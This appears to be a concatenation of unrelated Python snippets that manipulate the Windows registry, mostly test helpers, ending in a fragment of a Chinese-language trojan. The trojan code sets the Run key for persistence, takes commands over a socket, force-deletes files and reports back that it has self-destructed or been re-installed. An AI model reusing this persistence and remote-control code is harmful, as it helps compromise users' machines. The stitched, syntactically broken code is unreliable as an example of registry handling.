def setup_module(machinery, name, path=None):
if machinery.WindowsRegistryFinder.DEBUG_BUILD:
root = machinery.WindowsRegistryFinder.REGISTRY_KEY_DEBUG
else:
root = machinery.WindowsRegistryFinder.REGISTRY_KEY
key = root.format(fullname=name,
sys_version='%d.%d' % sys.version_info[:2])
base_key = "Software\\Python\\PythonCore\\{}.{}".format(
sys.version_info.major, sys.version_info.minor)
assert key.casefold().startswith(base_key.casefold()), (
"expected key '{}' to start with '{}'".format(key, base_key))
try:
with temp_module(name, "a = 1") as location:
try:
OpenKey(HKEY_CURRENT_USER, base_key)
if machinery.WindowsRegistryFinder.DEBUG_BUILD:
delete_key = os.path.dirname(key)
else:
delete_key = key
except OSError:
delete_key = base_key
subkey = CreateKey(HKEY_CURRENT_USER, key)
if path is None:
path = location + ".py"
SetValue(subkey, "", REG_SZ, path)
yield
finally:
if delete_key:
delete_registry_tree(HKEY_CURRENT_USER, delete_key)
def maybe_set_key(key_path: str, expected: str, dry_run: bool = False, var_name: str = None):
from winreg import HKEY_CLASSES_ROOT, OpenKey, QueryValue, CreateKeyEx, SetValue, REG_SZ, KEY_WRITE, KEY_READ
from winreg import QueryValueEx, SetValueEx
try:
with OpenKey(HKEY_CLASSES_ROOT, key_path, 0, KEY_READ) as entry_key:
if var_name:
value = QueryValueEx(entry_key, var_name)[0]
else:
value = QueryValue(entry_key, None)
except FileNotFoundError:
value = None
if value != expected:
prefix = '[DRY RUN] Would set' if dry_run else 'Setting'
if var_name:
log.info(f'{prefix} HKEY_CLASSES_ROOT\\{key_path}[{var_name!r}] = {expected!r}')
else:
log.info(f'{prefix} HKEY_CLASSES_ROOT\\{key_path} = {expected!r}')
if not dry_run:
with CreateKeyEx(HKEY_CLASSES_ROOT, key_path, 0, KEY_WRITE) as entry_key:
if var_name:
SetValueEx(entry_key, var_name, 0, REG_SZ, expected)
else:
SetValue(entry_key, None, REG_SZ, expected) # noqa
else:
log.info(f'Already contains expected value: HKEY_CLASSES_ROOT\\{key_path}')
def test_long_key(self):
from winreg import (HKEY_CURRENT_USER, KEY_ALL_ACCESS, CreateKey,
SetValue, EnumKey, REG_SZ, QueryInfoKey, OpenKey,
DeleteKey)
name = 'x' * 256
try:
with CreateKey(HKEY_CURRENT_USER, self.test_key_name) as key:
SetValue(key, name, REG_SZ, 'x')
num_subkeys, num_values, t = QueryInfoKey(key)
EnumKey(key, 0)
finally:
with OpenKey(HKEY_CURRENT_USER, self.test_key_name, 0,
KEY_ALL_ACCESS) as key:
DeleteKey(key, name)
DeleteKey(HKEY_CURRENT_USER, self.test_key_name)
def setup_module(machinery, name, path=None):
if machinery.WindowsRegistryFinder.DEBUG_BUILD:
root = machinery.WindowsRegistryFinder.REGISTRY_KEY_DEBUG
else:
root = machinery.WindowsRegistryFinder.REGISTRY_KEY
key = root.format(fullname=name, sys_version=sys.version[:3])
try:
with temp_module(name, "a = 1") as location:
subkey = CreateKey(HKEY_CURRENT_USER, key)
if path is None:
path = location + ".py"
SetValue(subkey, "", REG_SZ, path)
yield
finally:
if machinery.WindowsRegistryFinder.DEBUG_BUILD:
key = os.path.dirname(key)
delete_registry_tree(HKEY_CURRENT_USER, key)
def test_simple_write(self):
from winreg import SetValue, QueryValue, REG_SZ
value = "Some Default value"
SetValue(self.root_key, self.test_key_name, REG_SZ, value)
assert QueryValue(self.root_key, self.test_key_name) == value
def windows_registry_set_key(key_path, value):
from winreg import CreateKey, SetValue, HKEY_CURRENT_USER, REG_SZ
with CreateKey(HKEY_CURRENT_USER, key_path) as sub_key:
SetValue(sub_key, None, REG_SZ, value)
def ziqidong():
caller_file = argv[0]
caller_file = caller_file.replace('/', '\\')
#caller_file = caller_file.replace('py', 'exe')
key = OpenKey(HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion")
SetValue(key, "Run", REG_SZ, caller_file)
t = 1
break
elif lei == '4':
c = s.recv(100).decode('utf-8')
if c == '0':
caller_filez = argv[0]
caller_filez = caller_filez.replace('/', '\\')
caller_file = caller_filez.replace('win_64.exe', 'win_64_1.txt')
minglin = r'del /a/f/q {}'.format(caller_file)
system(minglin)
caller_file = caller_filez.replace('win_64.exe', 'win_64_2.txt')
minglin = r'del /a/f/q {}'.format(caller_file)
system(minglin)
kong = ''
key = OpenKey(HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion")
SetValue(key, "Run", REG_SZ, kong)
cc = '它自毁了,请节哀,并准备下一个目标吧|斜眼笑|'
s.send(cc.encode('utf-8'))
continue
ziqidong()
caller_file = argv[0]
caller_file = caller_file.replace('/', '\\')
caller_file = caller_file.replace('py', 'exe')
c = '木马:已再次写入注册表'+'\n具体目录为:'+caller_file
s.send(c.encode('utf-8'))
else:
print('收到垃圾信息')
sleep(30)
break
if t == 1:
s.send('木马已被kill,他(她)暂时安全了'.encode('utf-8'))
